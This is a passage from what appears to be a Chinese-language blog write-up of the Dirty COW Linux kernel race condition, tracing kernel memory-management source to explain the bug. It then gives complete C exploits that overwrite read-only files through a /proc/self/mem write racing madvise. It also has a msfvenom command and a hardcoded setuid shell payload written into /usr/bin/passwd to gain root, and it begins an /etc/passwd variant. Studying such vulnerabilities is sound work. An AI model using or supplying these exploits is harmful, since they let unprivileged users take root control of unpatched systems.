9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
int alloc_set_pte(struct fault_env *fe, struct mem_cgroup *memcg,
struct page *page)
{
struct vm_area_struct *vma = fe->vma;
bool write = fe->flags & FAULT_FLAG_WRITE;
pte_t entry;
int ret;

if (pmd_none(*fe->pmd) && PageTransCompound(page) &&
IS_ENABLED(CONFIG_TRANSPARENT_HUGE_PAGECACHE)) {
/* THP on COW? */
VM_BUG_ON_PAGE(memcg, page);

ret = do_set_pmd(fe, page);
if (ret != VM_FAULT_FALLBACK)
return ret;
}

if (!fe->pte) {
ret = pte_alloc_one_map(fe);
if (ret)
return ret;
}

/* Re-check under ptl */
if (unlikely(!pte_none(*fe->pte)))
return VM_FAULT_NOPAGE;

flush_icache_page(vma, page);
entry = mk_pte(page, vma->vm_page_prot); //根据页物理地址与VMA权限生成PTE
if (write) //pte_mkdirty会给PTE加上脏位
entry = maybe_mkwrite(pte_mkdirty(entry), vma); //如果这片VMA可写,那么maybe_mkwrite()会给PTE加上可写位
/* copy-on-write page */
//建立反向映射:从page对象触发,找到映射到此的VMA
if (write && !(vma->vm_flags & VM_SHARED)) {
inc_mm_counter_fast(vma->vm_mm, MM_ANONPAGES);
page_add_new_anon_rmap(page, vma, fe->address, false);
mem_cgroup_commit_charge(page, memcg, false, false);
lru_cache_add_active_or_unevictable(page, vma);
} else {
inc_mm_counter_fast(vma->vm_mm, mm_counter_file(page));
page_add_file_rmap(page, false);
}
//在页表中设置PTE
set_pte_at(vma->vm_mm, fe->address, fe->pte, entry);

/* no need to invalidate: a not-present page won't be cached */
//更新MMU缓存
update_mmu_cache(vma, fe->address, fe->pte);

return 0;
}

调用链如下

1
2
3
4
5
6
7
8
9
10
faultin_page()
handle_mm_fault()
__handle_mm_fault()
handle_pte_fault()
do_fault()
do_cow_fault()
alloc_set_pte()
maybe_mkwrite()
pte_mkdirty()

__get_user_pagesの第二次循环

分配到COW页之后回到retry,第二次进入follow_page_mask(),这次一切正常,进入follow_page_pte()

but由于PTE不可写入, 且flags中设置了FOLL_WRITE标志, 因此会再次失败,follow_page_mask()返回值为NULL,继续进入faultin_page处理缺页异常

1
2
3
4
if ((flags & FOLL_WRITE) && !pte_write(pte)) {//如果要求写入,但是pte表示不可写入
pte_unmap_unlock(ptep, ptl);
return NULL;
}

由于要进行写入操作, 并且对应页存在, 因此handle_pte_fault()会调用do_wp_page()进行写时复制

1
2
3
if (fe->flags & FAULT_FLAG_WRITE) {//存在 FAULT_FLAG_WRITE 标志位,表示缺页异常由写操作引起
if (!pte_write(entry))//对应的页不可写
return do_wp_page(fe, entry);//进行写时复制,将内容写入由 do_fault()->do_cow_fault()分配的内存页中

do_wp_page()流程如下

    • 调用vm_normal_page() 根据address找到对应的页描述符
    • 如果发现是匿名页, 并且此页只有一个引用, 那么会调用wp_page_reuse()直接重用这个页.
    • 第一次faultin_page()时进入do_cow_fault(), 就已经专门复制了一页, 因此会直接进入wp_page_reuse() 重用这个页
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
//能否重用一个页
if (reuse_swap_page(old_page, &total_mapcount)) {
//如果这个匿名页只有一个映射,那么不用重新分配页,直接把旧页拿去写
if (total_mapcount == 1) {
/*
* The page is all ours. Move it to
* our anon_vma so the rmap code will
* not search our parent or siblings.
* Protected against the rmap code by
* the page lock.
*/
//把旧业放到anon_vma中,这个涉及到反向映射
page_move_anon_rmap(old_page, vma);
}
unlock_page(old_page);
//旧页只属于这个进程,尝试给PTE加上可写入标志
return wp_page_reuse(fe, orig_pte, old_page, 0, 0);
}

wp_page_reuse()主要就是设置PTE, 然后返回VM_FAULT_WRITE

    • 注意由于这片VMA不可写入,因此PTE任然没有RW标志,
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
static inline int wp_page_reuse(struct fault_env *fe, pte_t orig_pte,
struct page *page, int page_mkwrite, int dirty_shared)
__releases(fe->ptl)
{
struct vm_area_struct *vma = fe->vma;
pte_t entry;
/*
* Clear the pages cpupid information as the existing
* information potentially belongs to a now completely
* unrelated process.
*/
if (page)
page_cpupid_xchg_last(page, (1 << LAST_CPUPID_SHIFT) - 1);

flush_cache_page(vma, fe->address, pte_pfn(orig_pte));
entry = pte_mkyoung(orig_pte); //标记下刚刚访问过
entry = maybe_mkwrite(pte_mkdirty(entry), vma); //设置脏位,如果VMA可写的话设置写入位
if (ptep_set_access_flags(vma, fe->address, fe->pte, entry, 1)) //写入PTE
update_mmu_cache(vma, fe->address, fe->pte); //更新mmu缓存
pte_unmap_unlock(fe->pte, fe->ptl);

if (dirty_shared) {
struct address_space *mapping;
int dirtied;

if (!page_mkwrite)
lock_page(page);

dirtied = set_page_dirty(page);
VM_BUG_ON_PAGE(PageAnon(page), page);
mapping = page->mapping;
unlock_page(page);
put_page(page);

if ((dirtied || page_mkwrite) && mapping) {
/*
* Some device drivers do not set page.mapping
* but still dirty their pages
*/
balance_dirty_pages_ratelimited(mapping);
}

if (!page_mkwrite)
file_update_time(vma->vm_file);
}
return VM_FAULT_WRITE; //返回这个标志表示进行COW之后,这个页可以写入了
}

最后handle_mm_fault()返回到faultin_page()中时, 由于返回了VM_FAULT_WRITE标志, 表示可以写入, 因此会去掉flags中的FOLL_WRITE标志, 不再检查写入权限

1
2
3
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
*flags &= ~FOLL_WRITE;
return 0;

调用链如下

1
2
3
4
5
6
7
8
9
faultin_page()
handle_mm_fault()
__handle_mm_fault()
handle_pte_fault()
do_fault()
do_wp_page()
wp_page_reuse()
maybe_mkwrite(pte_mkdirty(entry), vma);
return VM_FAULT_WRITE;

__get_user_pagesの第三次循环

第三次进入follow_page_mask(), 由于之前去掉了FOLL_WRITE标志, 因此不会检查PTE有没有写入权限, 从而通过follow_page_mask()返回对应的页

1
2
3
4
5
if ((flags & FOLL_WRITE) && !pte_write(pte)) {//如果要求写入,但是pte表示不可写入
pte_unmap_unlock(ptep, ptl);
return NULL;
}

  • 之后会沿着路径返回: get_user_pages() ->__ get_user_pages_locked() -> get_user_page_remote() -> __access_remote_vm()
  • __access_remote_vm()锁定页面后, 先调用kmap把页面映射到内核地址空间中, 再调用copy_to_user_page()完成从内核缓冲区到对应页面的写入
1
2
3
4
5
6
7
8
9
10
//此时的page为get_user_pages_remote()为用户寻找的,是被锁定在内存中的页,kmap将其映射在内核地址空间中
maddr = kmap(page);
if (write) { //写入请求
/*
先调用copy_to_user_page()进行写入
maddr为根据addr锁定的页,offset为addr额页内偏移,两者相加就是要写入的地址
等价为:memcpy(maddr + offset, buf, bytes)
*/
copy_to_user_page(vma, page, addr,
maddr + offset, buf, bytes);

madviseの使用方法

madvise()系统掉用,用于向内核提供对于起始地址为addr,长度为length的内存空间的操作建议或者指示。在大多数情况下,此类建议的目标是提高系统或者应用程序的性能。

测试demo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#include <stdio.h>
#include <sys/mman.h>
#include <stdlib.h>
#include <fcntl.h>

int fd;
struct stat st;
void *mem;

void processMem(void)
{
int f = open("/proc/self/mem", O_RDWR);
lseek(f, mem, SEEK_SET);
write(f, "AAA", 3);
printf("%s\n", (char *)mem);

madvise(mem, 0x100, MADV_DONTNEED);
}

int main(void)
{
fd = open("/flag", O_RDONLY);
fstat(fd, &st);
mem = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);

processMem();
}

sys_madvise()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
/*
* The madvise(2) system call.
*
* Applications can use madvise() to advise the kernel how it should
* handle paging I/O in this VM area. The idea is to help the kernel
* use appropriate read-ahead and caching techniques. The information
* provided is advisory only, and can be safely disregarded by the
* kernel without affecting the correct operation of the application.
*
* behavior values:
* MADV_NORMAL - the default behavior is to read clusters. This
* results in some read-ahead and read-behind.
* MADV_RANDOM - the system should read the minimum amount of data
* on any access, since it is unlikely that the appli-
* cation will need more than what it asks for.
* MADV_SEQUENTIAL - pages in the given range will probably be accessed
* once, so they can be aggressively read ahead, and
* can be freed soon after they are accessed.
* MADV_WILLNEED - the application is notifying the system to read
* some pages ahead.
* MADV_DONTNEED - the application is finished with the given range,
* so the kernel can free resources associated with it.
* MADV_FREE - the application marks pages in the given range as lazy free,
* where actual purges are postponed until memory pressure happens.
* MADV_REMOVE - the application wants to free up the given range of
* pages and associated backing store.
* MADV_DONTFORK - omit this area from child's address space when forking:
* typically, to avoid COWing pages pinned by get_user_pages().
* MADV_DOFORK - cancel MADV_DONTFORK: no longer omit this area when forking.
* MADV_HWPOISON - trigger memory error handler as if the given memory range
* were corrupted by unrecoverable hardware memory failure.
* MADV_SOFT_OFFLINE - try to soft-offline the given range of memory.
* MADV_MERGEABLE - the application recommends that KSM try to merge pages in
* this area with pages of identical content from other such areas.
* MADV_UNMERGEABLE- cancel MADV_MERGEABLE: no longer merge pages with others.
* MADV_HUGEPAGE - the application wants to back the given range by transparent
* huge pages in the future. Existing pages might be coalesced and
* new pages might be allocated as THP.
* MADV_NOHUGEPAGE - mark the given range as not worth being backed by
* transparent huge pages so the existing pages will not be
* coalesced into THP and new pages will not be allocated as THP.
* MADV_DONTDUMP - the application wants to prevent pages in the given range
* from being included in its core dump.
* MADV_DODUMP - cancel MADV_DONTDUMP: no longer exclude from core dump.
*
* return values:
* zero - success
* -EINVAL - start + len < 0, start is not page-aligned,
* "behavior" is not a valid value, or application
* is attempting to release locked or shared pages.
* -ENOMEM - addresses in the specified range are not currently
* mapped, or are outside the AS of the process.
* -EIO - an I/O error occurred while paging in data.
* -EBADF - map exists, but area maps something that isn't a file.
* -EAGAIN - a kernel resource was temporarily unavailable.
*/
/*
进程可以使用madvise()来建议内核怎么处理相关内存区域
@start: 内存起始地址
@len_in: 长度
@behavior: 建议
*/
SYSCALL_DEFINE3(madvise, unsigned long, start, size_t, len_in, int, behavior)
{
unsigned long end, tmp;
struct vm_area_struct *vma, *prev;
int unmapped_error = 0;
int error = -EINVAL;
int write;
size_t len;
struct blk_plug plug;

#ifdef CONFIG_MEMORY_FAILURE
if (behavior == MADV_HWPOISON || behavior == MADV_SOFT_OFFLINE)
return madvise_hwpoison(behavior, start, start+len_in);
#endif
//检查一下behavior是否有效
if (!madvise_behavior_valid(behavior))
return error;
//要求起始地址与页对齐
if (start & ~PAGE_MASK)
return error;
//len向上关于页对齐
len = (len_in + ~PAGE_MASK) & PAGE_MASK;

/* Check to see whether len was rounded up from small -ve to zero */
//len溢出
if (len_in && !len)
return error;
//结束地址
end = start + len;
if (end < start)
return error;

error = 0;
if (end == start)
return error;
//判断下这个行为是否需要写入mmap,并获取相关信号量
write = madvise_need_mmap_write(behavior);
if (write) {
if (down_write_killable(&current->mm->mmap_sem))
return -EINTR;
} else {
down_read(&current->mm->mmap_sem);
}

/*
* If the interval [start,end) covers some unmapped address
* ranges, just ignore them, but return -ENOMEM at the end.
* - different from the way of handling in mlock etc.
*/
//找到start对应的VMA对象
vma = find_vma_prev(current->mm, start, &prev);
if (vma && start > vma->vm_start)
prev = vma;

blk_start_plug(&plug);
for (;;) {//遍历所有相关的VMA
/* Still start < end. */
error = -ENOMEM;
if (!vma)
goto out;

/* Here start < (end|vma->vm_end). */
if (start < vma->vm_start) {
unmapped_error = -ENOMEM;
start = vma->vm_start;
if (start >= end) //start没有对应的VMA
goto out;
}

/*tmp为本次建议的结束地址 Here vma->vm_start <= start < (end|vma->vm_end) */

tmp = vma->vm_end;
if (end < tmp)
tmp = end;

/*进行建议 Here vma->vm_start <= start < tmp <= (end|vma->vm_end). */
error = madvise_vma(vma, &prev, start, tmp, behavior);
if (error)
goto out;
start = tmp; //下一次循环的起始地址
if (prev && start < prev->vm_end)
start = prev->vm_end;
error = unmapped_error;
if (start >= end) //结束
goto out;
//重新寻找对应的VMA
if (prev)
vma = prev->vm_next;
else /* madvise_remove dropped mmap_sem */
vma = find_vma(current->mm, start);
}
out:
blk_finish_plug(&plug);
if (write)
up_write(&current->mm->mmap_sem);
else
up_read(&current->mm->mmap_sem);

return error;
}

madvise_vma()

madvice_vma()根据behavior把请求分配到对应处理函数, 对于MADV_DONTNEED会调用madvise_dontneed()处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
static long
madvise_vma(struct vm_area_struct *vma, struct vm_area_struct **prev,
unsigned long start, unsigned long end, int behavior)
{
switch (behavior) {
case MADV_REMOVE:
return madvise_remove(vma, prev, start, end);
case MADV_WILLNEED:
return madvise_willneed(vma, prev, start, end);
case MADV_FREE:
/*
* XXX: In this implementation, MADV_FREE works like
* MADV_DONTNEED on swapless system or full swap.
*/
if (get_nr_swap_pages() > 0)
return madvise_free(vma, prev, start, end);
/* passthrough */
case MADV_DONTNEED:
return madvise_dontneed(vma, prev, start, end);
default:
return madvise_behavior(vma, prev, start, end, behavior);
}
}

madvise_dontneed()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
/*
* Application no longer needs these pages. If the pages are dirty,
* it's OK to just throw them away. The app will be more careful about
* data it wants to keep. Be sure to free swap resources too. The
* zap_page_range call sets things up for shrink_active_list to actually free
* these pages later if no one else has touched them in the meantime,
* although we could add these pages to a global reuse list for
* shrink_active_list to pick up before reclaiming other pages.
*
* NB: This interface discards data rather than pushes it out to swap,
* as some implementations do. This has performance implications for
* applications like large transactional databases which want to discard
* pages in anonymous maps after committing to backing store the data
* that was kept in them. There is no reason to write this data out to
* the swap area if the application is discarding it.
*
* An interface that causes the system to free clean pages and flush
* dirty pages is already available as msync(MS_INVALIDATE).
*/
/*
应用表示不需要这些页,即使这些页是脏页,也直接丢弃,因此应用在丢弃前必须自己保存好数据
-zap_page_range()会设置shrink_active_list为实际要释放的页,如果一段时间后没有touch这些页,那么就会被释放*/
static long madvise_dontneed(struct vm_area_struct *vma,
struct vm_area_struct **prev,
unsigned long start, unsigned long end)
{
*prev = vma;
//这些页面无法丢弃
if (vma->vm_flags & (VM_LOCKED|VM_HUGETLB|VM_PFNMAP))
return -EINVAL;

zap_page_range(vma, start, end - start, NULL);
return 0;
}

zap_page_range()

zap_page_range()会遍历给定范围内所有的VMA, 对每一个VMA调用unmap_single_vma(...)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
/**
* zap_page_range - remove user pages in a given range
* @vma: vm_area_struct holding the applicable pages
* @start: starting address of pages to zap
* @size: number of bytes to zap
* @details: details of shared cache invalidation
*
* Caller must protect the VMA list
*/
void zap_page_range(struct vm_area_struct *vma, unsigned long start,
unsigned long size, struct zap_details *details)
{
struct mm_struct *mm = vma->vm_mm;
struct mmu_gather tlb;
unsigned long end = start + size;

lru_add_drain();
tlb_gather_mmu(&tlb, mm, start, end);
update_hiwater_rss(mm);
mmu_notifier_invalidate_range_start(mm, start, end);
//遍历从vma开始,到end结束的所有VMA
for ( ; vma && vma->vm_start < end; vma = vma->vm_next)
unmap_single_vma(&tlb, vma, start, end, details);
mmu_notifier_invalidate_range_end(mm, start, end);
tlb_finish_mmu(&tlb, start, end);
}

后续会沿着unmap_single_vma() => unmap_page_range() => zap_pud_range() => zap_pmd_range() => zap_pte_range()的路径遍历各级页表项, 最后调用zap_pte_range()遍历每一个PTE

zap_pte_range()

zap_pte_range()会释放范围内所有的页

然后遍历范围内所有页, 清空页表中对应的PTE, 并减少对应页的引用计数, 当页的引用计数为0时会被内核回收

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
//释放pte对应的页
static unsigned long zap_pte_range(struct mmu_gather *tlb,
struct vm_area_struct *vma, pmd_t *pmd,
unsigned long addr, unsigned long end,
struct zap_details *details)
{
struct mm_struct *mm = tlb->mm;
int force_flush = 0;
int rss[NR_MM_COUNTERS];
spinlock_t *ptl;
pte_t *start_pte;
pte_t *pte;
swp_entry_t entry;
struct page *pending_page = NULL;

again:
init_rss_vec(rss);
start_pte = pte_offset_map_lock(mm, pmd, addr, &ptl);
pte = start_pte;
arch_enter_lazy_mmu_mode();
//遍历[addr, end)范围的每一个页
do {
pte_t ptent = *pte;
if (pte_none(ptent)) { //如果页描述范围为none则什么也不用做
continue;
}

if (pte_present(ptent)) {// 如果页存在
struct page *page;

page = vm_normal_page(vma, addr, ptent); //根据addr找到对应页描述符
if (unlikely(details) && page) {
/*
* unmap_shared_mapping_pages() wants to
* invalidate cache without truncating:
* unmap shared but keep private pages.
*/
if (details->check_mapping &&
details->check_mapping != page_rmapping(page))
continue;
}
ptent = ptep_get_and_clear_full(mm, addr, pte,
tlb->fullmm); //获取原来的PTE并清空页表中对应的PTE
tlb_remove_tlb_entry(tlb, pte, addr);//清除TLB中对应条目
if (unlikely(!page))
continue;

if (!PageAnon(page)) { //如果映射到文件,虽然不回写文件,但是需要调用文件地址空间相关回调函数
if (pte_dirty(ptent)) { //如果时脏页
/*
* oom_reaper cannot tear down dirty
* pages
*/
if (unlikely(details && details->ignore_dirty))
continue;
force_flush = 1;
set_page_dirty(page); //调用文件对应地址空间中的: mapping->a_ops->set_page_dirty()方法
}
if (pte_young(ptent) &&
likely(!(vma->vm_flags & VM_SEQ_READ)))
mark_page_accessed(page); //标记下页面刚刚访问过
}
//移出反向映射,并减少page的引用计数
rss[mm_counter(page)]--;
page_remove_rmap(page, false);
if (unlikely(page_mapcount(page) < 0))
print_bad_pte(vma, addr, ptent, page);
if (unlikely(__tlb_remove_page(tlb, page))) { //TLB中移出对应页
force_flush = 1;
pending_page = page;
addr += PAGE_SIZE;
break;
}
continue; //处理下一个页
}
/* only check swap_entries if explicitly asked for in details */
if (unlikely(details && !details->check_swap_entries))
continue;

entry = pte_to_swp_entry(ptent);
if (!non_swap_entry(entry))
rss[MM_SWAPENTS]--;
else if (is_migration_entry(entry)) {
struct page *page;

page = migration_entry_to_page(entry);
rss[mm_counter(page)]--;
}
if (unlikely(!free_swap_and_cache(entry)))
print_bad_pte(vma, addr, ptent, NULL);
pte_clear_not_present_full(mm, addr, pte, tlb->fullmm);
} while (pte++, addr += PAGE_SIZE, addr != end);

add_mm_rss_vec(mm, rss);
arch_leave_lazy_mmu_mode();

/* Do the actual TLB flush before dropping ptl */
if (force_flush)
tlb_flush_mmu_tlbonly(tlb);
pte_unmap_unlock(start_pte, ptl);

/*
* If we forced a TLB flush (either due to running out of
* batch buffers or because we needed to flush dirty TLB
* entries before releasing the ptl), free the batched
* memory too. Restart if we didn't do everything.
*/
if (force_flush) {
force_flush = 0;
tlb_flush_mmu_free(tlb);
if (pending_page) {
/* remove the page with new size */
__tlb_remove_pte_page(tlb, pending_page);
pending_page = NULL;
}
if (addr != end)
goto again;
}

return addr;
}

0x03:漏洞分析

牛魔的,终于到这了

让我们来回顾一下整个流程

  • step Ⅰ:__get_user_pages()第一次循环,faultin_page()判断属于写入只读区域的情况, 因此会调用do_cow_fault()do_cow_fault()会复制原始的文件缓存页到一个新页中, 并设置PTE映射到这个新页, 但由于VMA不可写入, 因此这个新页的PTE页没有设置RW标志
  • step Ⅱ:__get_user_pages()第二次循环,由于foll_flags中有FOLL_WRITE标志, 但是页对应的PTE没有RW标志, 因此follow_page_mask()判断权限有问题,。再次进入faultin_page()faultin_page()判断, 属于写入只读的已存在的页造成的问题, 因此会调用do_wp_page()处理。do_wp_page()发现对应页是只有一个引用的匿名页,因此会调用wp_page_reuse()直接重用这个页。wp_page_reuse()由于对应VMA只读, 因此只会给PTE设置一个Dirty标志, 而不会设置RW标志, 然后返回一个VM_FAULT_WRITE表示内核可以写入这个页。返回到faultin_page()中, 由于handle_mm_fault()返回了VM_FAULT_WRITE, 因此会去掉FOLL_WRITE标志, 含义为: 虽然此页对应PTE不可写入, 但是已经COW过了, 内核是可以写入的, 后续follow_page_mask()就不要检查能不能写入了。

此时,我们调用madvise,并建议内核执行其中DONTNEEDbehavior,内核清空此PTE会发生什么捏??🤔

首先follow_page_mask()会因为对应PTE为NULL而再次失败, 进入faultin_page(), 但是注意, 这次进入的时候没有FOLL_WRITE标志。faultin_page()因此设置fault_flags时是没有FAULT_FALG_WRITE标志的, 也就是说faultin_page()handle_mm_fault()承诺不会写入这个页。handle_mm_fault()由于PTENONE, 并且不要求写入, 因此最终会分派给do_read_fault()处理

do_read_fault()

do_read_fault()会查找这片VMA映射的地址空间中, address对应的原始缓存页, 然后返回这个原始缓存页

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
static int do_read_fault(struct fault_env *fe, pgoff_t pgoff)
{
struct vm_area_struct *vma = fe->vma;
struct page *fault_page;
int ret = 0;

/*
* Let's call ->map_pages() first and use ->fault() as fallback
* if page by the offset is not ready to be mapped (cold cache or
* something).
*/
if (vma->vm_ops->map_pages && fault_around_bytes >> PAGE_SHIFT > 1) {
ret = do_fault_around(fe, pgoff);
if (ret)
return ret;
}

ret = __do_fault(fe, pgoff, NULL, &fault_page, NULL);
if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
return ret;

ret |= alloc_set_pte(fe, NULL, fault_page);
if (fe->pte)
pte_unmap_unlock(fe->pte, fe->ptl);
unlock_page(fault_page);
if (unlikely(ret & (VM_FAULT_ERROR | VM_FAULT_NOPAGE | VM_FAULT_RETRY)))
put_page(fault_page);
return ret;
}

虽然执行的时deo_read_fault,但此时的write flag可是true,于是在__access_remote_vm中会调用copy_to_user_page()把用户空间的数据写入固定的页,由此污染了文件的原始缓存页。

一段时间后,当进行磁盘同步时内核会把被污染的页面回写到磁盘中,修改只读文件的内容。

由此,利用完成。

必要な問題

不难想到,开启两个线程便能在第二次__get_user_pages之后,第三次__get_user_pages之前完成madvise

但是时间窗口很重要,这意味着此利用的成功率以及实用价值

幸运的是在每次循环的开头,都会调用cond_resched()切换到别的任务,这个时间间隔完全可以满足

1
2
3
if (unlikely(fatal_signal_pending(current)))
return i ? i : -ERESTARTSYS;
cond_resched();//调度执行别的任务

0x04:利用 & exp编写

先来写一个验证poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
#include <sys/sem.h>
#include <semaphore.h>

struct stat dest_st, fake_st;
void *mem;
int mem_fd, dest_fd, fake_fd;
char *fake_data;
pthread_t mem_pthread, madvise_pthread;

void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}

void * mem_func()
{
mem_fd = open("/proc/self/mem", O_RDWR);
for (int i = 0; i < 0x100000; i++)
{
lseek(mem_fd, (off_t) mem, SEEK_SET);
write(mem_fd, fake_data, 0x1000);
}
return NULL;
}

void * madvise_func()
{
for (int i = 0; i< 0x100000; i++)
{
madvise(mem, 0x100, MADV_DONTNEED);
}
return NULL;
}

int main(int argc, char ** argv)
{
if (argc != 3)
err_exit("pls usage ./exp destination_file fake_file");

//open & read fake file
fake_fd = open(argv[2], O_RDONLY);
fstat(fake_fd, &fake_st);
printf("fake_fd is %d\n", fake_fd);
fake_data = malloc(fake_st.st_size);
read(fake_fd, fake_data, fake_st.st_size);

//open dest file
dest_fd = open(argv[1], O_RDONLY);
printf("dest_fd is %d\n", dest_fd);
fstat(dest_fd, &dest_st);
mem = mmap(NULL, dest_st.st_size, PROT_READ, MAP_PRIVATE, dest_fd, 0);

pthread_create(&mem_pthread, NULL, mem_func, NULL);
pthread_create(&madvise_pthread, NULL, madvise_func, NULL);

pthread_join(mem_pthread, NULL);
pthread_join(madvise_pthread, NULL);


return 0;
}


可以看到对于普通用户只有只读权限的文件,已经可以覆写了

那么接下来就能进行一些嘿嘿嘿🥵🥵🥵的事情了

利用suid进行提权

这个手法在渗透中也是很常见了,在此就不再赘述了

基本上就是利用dirtycow把具有suid的文件给越权篡改,写进提权的shellcode,再执行就好了

poc

msf生成shellcode

1
msfvenom -p linux/x64/exec PrependSetuid=True -f elf | xxd -i
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>
#include <sys/sem.h>
#include <semaphore.h>

struct stat dest_st;
void *mem;
int data_len = 149;
pthread_t mem_pthread, madvise_pthread;
int dest_fd, fake_fd, mem_fd;

unsigned char attack_data[] = {
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb2, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x48, 0xb8, 0x2f, 0x62,
0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54, 0x5f, 0x52, 0x5e,
0x6a, 0x3b, 0x58, 0x0f, 0x05
};

void * mem_func(void * argv)
{
mem_fd = open("/proc/self/mem", O_RDWR);
printf("mem_fd is %d\n", mem_fd);
for (int i = 0; i < 0x100000; i++)
{
lseek(mem_fd, (off_t) mem, SEEK_SET);
write(mem_fd, attack_data, data_len);
}
return NULL;
}

void * madvise_func(void * argv)
{
for (int i = 0; i < 0x100000; i++)
{
madvise(mem, 0x100, MADV_DONTNEED);
}
return NULL;
}

int main(int argc, char ** argv)
{

dest_fd = open("/usr/bin/passwd", O_RDONLY);
printf("dest_fd is %d\n", dest_fd);
fstat(dest_fd, &dest_st);
mem = mmap(NULL, dest_st.st_size, PROT_READ, MAP_PRIVATE, dest_fd, 0);

pthread_create(&mem_pthread, NULL, mem_func, NULL);
pthread_create(&madvise_pthread, NULL, madvise_func, NULL);

pthread_join(madvise_pthread, NULL);
pthread_join(mem_pthread, NULL);



return 0;
}


碎碎念:

​ 首先我试图用strlen完成对shellcode的计数,但是无论如何都无法成功,估计是strlen会对内存中的页布局有影响🤔(如果有带师傅了解是什么原因请务必联系一下铸币笔者,不胜感激呜呜呜😭😭😭)

​ 其次是随便拉了一个kernel题的文件系统,替换了下内核便充当漏洞复现环境了,结果具有suid的文件只有busybox一个,这玩意根本覆写不了一点,写完直接kernel panic。然后放了一个手动赋予suidtest程序进去,覆写完执行会segment fault。无奈只能下了一个ubuntu14.04

​ 最后便是提完权后,过一会会,也会dump掉。

利用/etc/passwd/完成提权

往/etc/passwd新添一个具有root权限的用户即可

poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
